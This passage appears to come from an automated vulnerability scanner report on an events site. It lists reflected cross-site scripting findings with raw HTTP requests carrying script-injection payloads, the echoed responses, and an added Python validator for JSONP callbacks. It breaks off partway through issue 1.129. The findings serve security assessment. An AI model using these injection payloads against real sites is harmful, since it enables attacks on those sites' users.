Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 36
ETag: "780885bfeb8e7922802451bddfb87c7b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYzkxOGM4MzUxZTczYWE2NzhkNzNjNzhiNDM0ZTlhZmIiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--caf4bc8c9f78d4a14f6eb98c46966d71fd36d308; path=/; expires=Tue, 03-May-2011 19:05:15 GMT; HttpOnly
Content-Length: 65327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/?f9e5a"><script>alert(1)</script>8d769312283=1" />
...[SNIP]...

1.121. http://events.ocregister.com/json [jsonsp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /json

Issue detail

The value of the jsonsp request parameter is copied into the HTML document as plain text between tags. The payload 89933<script>alert(1)</script>7b37a8f386f was submitted in the jsonsp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?jsonsp=Zvents_load_ZventsWidget189933<script>alert(1)</script>7b37a8f386f&limit=7&p=49&sid=za5509dx0r HTTP/1.1
Host: events.ocregister.com
Proxy-Connection: keep-alive
Referer: http://www.ocregister.com/templates/zventsIframe.php?domain=events.ocregister.com&c=Irvine%2CCA&template=zventsOCR.html&z=92614&p=49&r=30&t=Things+to+do+in+Orange+County
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1296750717165; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296972000168%26vn%3D1; s_vnum_m=1298959200170%26vn%3D1; s_cc=true; s_nr=1296750723302; sinvisit_w=true; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 18:54:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 52
ETag: "d7c036a0dd93fed8ab5b6c1e4b9f60d9"
X-Content-Digest: 34be3dfebb38770614f9987162ba8d7ae756151c
Cache-Control: max-age=1800, public
Set-Cookie: welcome=qgbAkKCZdDi4uPN4b06Ptw.100548280; path=/; expires=Fri, 03-Feb-2012 18:54:58 GMT
Set-Cookie: zvents_tracker_sid=qgbAkKCZdDi4uPN4b06Ptw.100548280; path=/; expires=Fri, 03-Feb-2012 18:54:58 GMT
Age: 0
Content-Length: 22080

Zvents_load_ZventsWidget189933<script>alert(1)</script>7b37a8f386f('callback({"rsp":{"status":"ok","content":{"events":[{"name":"Hair","price":"$20-$80","private":false,"editors_pick":false,"url":"http://www.scfta.org/home/Events/EventDetail.aspx?EventID=996","approv
...[SNIP]...
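
Issue 1.121 is a JSONP endpoint that echoes the jsonsp callback name verbatim at the very start of the body, serves the result as text/html, and marks it Cache-Control: max-age=1800, public (the X-Rack-Cache header reads "miss, store"), so the reflected body is both rendered as a document by a browser that navigates to the URL and eligible for caching under that URL. The fix is to validate the callback name against a strict identifier grammar and to label the response as script. The following is an added example, not code from this report or from the site's application; the function names, the dotted-identifier grammar and the 64-character limit are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Grammar for an acceptable callback: a dotted chain of ASCII JavaScript
# identifiers, e.g. "Zvents_load_ZventsWidget1" or "window.onEvents".
# Anything else is rejected outright; there is no "sanitising" step that
# could be bypassed. (Assumed policy, not the site's.)
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64   # assumed limit; generous for generated widget names


def valid_callback(name):
    return (isinstance(name, str)
            and 0 < len(name) <= MAX_CALLBACK_LEN
            and CALLBACK_RE.match(name) is not None)


def callback_from_url(url, param="jsonsp"):
    """Pull the callback parameter out of a request URL the way the
    endpoint in 1.121 would see it (first value wins, blank allowed)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get(param, [""])[0]


def jsonp_response(callback, payload_json):
    """Return (status, headers, body) for a JSONP reply.

    A bad callback name gets a 400 instead of being echoed; the body is
    labelled application/javascript rather than text/html, so a browser
    that navigates to the URL never parses it as a document; nosniff
    stops content-type guessing. payload_json is assumed to be the output
    of json.dumps. Caching headers are left to the caller: a cacheable
    reflected body is as good as a stored one for whoever hits that URL
    next."""
    if not valid_callback(callback):
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid callback"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, "%s(%s);" % (callback, payload_json)
```

Run against the request in 1.121, callback_from_url returns the injected name and valid_callback rejects it, so the 400 path is taken and nothing from the query string reaches the body.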

1.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f3e"><script>alert(1)</script>ceef51fea12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies?94f3e"><script>alert(1)</script>ceef51fea12=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 35
ETag: "c0f4f1fc3bc6259535d47d2f6f8cb72b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlMmVjZjJiZWU3YjBlM2M3MDU1OGVkNzU1ZjBlZGQwNjgiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--3e161b60fc3c855f9fa48059642bdc8dd590f651; path=/; expires=Tue, 03-May-2011 19:05:24 GMT; HttpOnly
Content-Length: 45429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies?94f3e"><script>alert(1)</script>ceef51fea12=1" />
...[SNIP]...

1.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a3ab"><script>alert(1)</script>f73c13b2255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1 HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 32
ETag: "6be2db74288711698c669e7a4a441f54"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlYmZjOTM3OTUyZGFmODA5NzJkNGZkYzVlNTgxMWY3Y2YiDWxvY2F0aW9uexAiCWNpdHkiC0lydmluZSILcmFkaXVzaSMiDWxhdGl0dWRlZhozMy42NzEzOTk5OTk5OTk5OTgARGciCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9JcnZpbmUsIENBIg10aW1lem9uZSIYQW1lcmljYS9Mb3NfQW5nZWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtMTE3Ljc5MQDItCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlIgdDQQ%3D%3D--0416affebe758d5443df7bf22fee89ccc5ebb2d5; path=/; expires=Tue, 03-May-2011 19:05:09 GMT; HttpOnly
Content-Length: 57433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/restaurants?6a3ab"><script>alert(1)</script>f73c13b2255=1" />
...[SNIP]...

1.124. http://events.ocregister.com/search [st_select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into the HTML document as plain text between tags. The payload 7c80e<script>alert(1)</script>e0b48eab0cb was submitted in the st_select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event7c80e<script>alert(1)</script>e0b48eab0cb&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 49
ETag: "77bab4dbd9d6705a99eb02a79686ff79"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYzY3ZDI5MTI2YTYwZTViNjY1NGI5NGJjNDBmMjkzMGIiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--6eb02058b9d8e991c3b0e92b4a5c4148ea061dad; path=/; expires=Tue, 03-May-2011 19:09:31 GMT; HttpOnly
Content-Length: 18755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Invalid search: event7c80e<script>alert(1)</script>e0b48eab0cb is not a valid search category.
</div>
...[SNIP]...

1.125. http://events.ocregister.com/search [st_select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f25f"><script>alert(1)</script>de56addb30 was submitted in the st_select parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event1f25f"><script>alert(1)</script>de56addb30&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "06f028fda06900f1b13fd20c60054a4b"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlODhmOTVmNzQ1MDU4YzUyMDBiM2I0YzY3ZWFlYTEzN2QiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--ec067a790e483d7dfe8d4b6ea1297846b4520489; path=/; expires=Tue, 03-May-2011 19:09:25 GMT; HttpOnly
Content-Length: 19030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<body id="body_event1f25f"><script>alert(1)</script>de56addb30">
...[SNIP]...

1.126. http://events.ocregister.com/search [st_select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d737d'%3balert(1)//cee44e0808f was submitted in the st_select parameter. This input was echoed as d737d';alert(1)//cee44e0808f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=eventd737d'%3balert(1)//cee44e0808f&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 40
ETag: "1a5e0c8a97b19fe60caf34eff0246e51"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlYTQ4MTRmMjM0YTA1NWE1OWU0ZGZjYjZlZDUxMDUwZDMiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--74df95328582d01966b7282bb77a024258216284; path=/; expires=Tue, 03-May-2011 19:09:29 GMT; HttpOnly
Content-Length: 17945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<script type="text/javascript">
Zvents.tracker.notifySearchView(
'',
'',
'st=eventd737d';alert(1)//cee44e0808f&what=superbowl11&where=Irvine%2CCA&ssi=0&ssrss=5&srss=11');
</script>
...[SNIP]...

1.127. http://events.ocregister.com/search [st_select parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the st_select request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744e1"%3balert(1)//1e62870ad6d was submitted in the st_select parameter. This input was echoed as 744e1";alert(1)//1e62870ad6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event744e1"%3balert(1)//1e62870ad6d&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:09:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 44
ETag: "44bc00ad2514211a96a52b1d0a58abc4"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlODQwMzk0YTE3NzM0YWZjM2FhOWIwODk4ZWViNTMzMDgiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--88663952c7d141dd6941ee06454236f0b51afd35; path=/; expires=Tue, 03-May-2011 19:09:26 GMT; HttpOnly
Content-Length: 18078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
nel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "superbowl11 Irvine,CA event744e1";alert(1)//1e62870ad6ds";

//-->
...[SNIP]...

1.128. http://events.ocregister.com/search [svt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the svt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66943"><script>alert(1)</script>2a358999d52 was submitted in the svt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?swhat=superbowl11&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text66943"><script>alert(1)</script>2a358999d52&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:10:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 102
ETag: "4cd0d17676110543bb27db6048bc57cc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlNmU3NTM0ZjgxZTI4MmI2MjMzY2I0YjgxYTFhZTU0YTAiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIQc3VwZXJib3dsMTEiDmxhc3Rfd2hlbiIAIgtidWNrZXRGIg1sYXN0X3JzcyIAIg1sb2NhdGlvbnsQIgljaXR5IgtJcnZpbmUiC3JhZGl1c2kjIg1sYXRpdHVkZWYaMzMuNjcxMzk5OTk5OTk5OTk4AERnIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPSXJ2aW5lLCBDQSINdGltZXpvbmUiGEFtZXJpY2EvTG9zX0FuZ2VsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYQLTExNy43OTEAyLQiEXdoZXJlX3N0cmluZyIOSXJ2aW5lLENBIgpzdGF0ZSIHQ0E%3D--a49d664e70e77f5c44832f46c21f504a901eeece; path=/; expires=Tue, 03-May-2011 19:10:05 GMT; HttpOnly
Content-Length: 33453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<input type="hidden" name="svt" value="text66943"><script>alert(1)</script>2a358999d52" />
...[SNIP]...

1.129. http://events.ocregister.com/search [swhat parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://events.ocregister.com
Path:   /search

Issue detail

The value of the swhat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd510</script><a%20b%3dc>535a6ed6f38 was submitted in the swhat parameter. This input was echoed as bd510</script><a b=c>535a6ed6f38 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?swhat=superbowl11bd510</script><a%20b%3dc>535a6ed6f38&swhen=&swhere=Irvine%2CCA&commit=Search&st_select=event&search=true&svt=text&srss= HTTP/1.1
Host: events.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; s_cc=true; s_lastvisit=1296750717165; zvents_tracker_sid=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; s_nr=1296750723302; welcome=gFDu54d2RzA0D1OeZSWZyg.100539684; sinvisit_m=true; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 03 Feb 2011 19:05:56 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 365
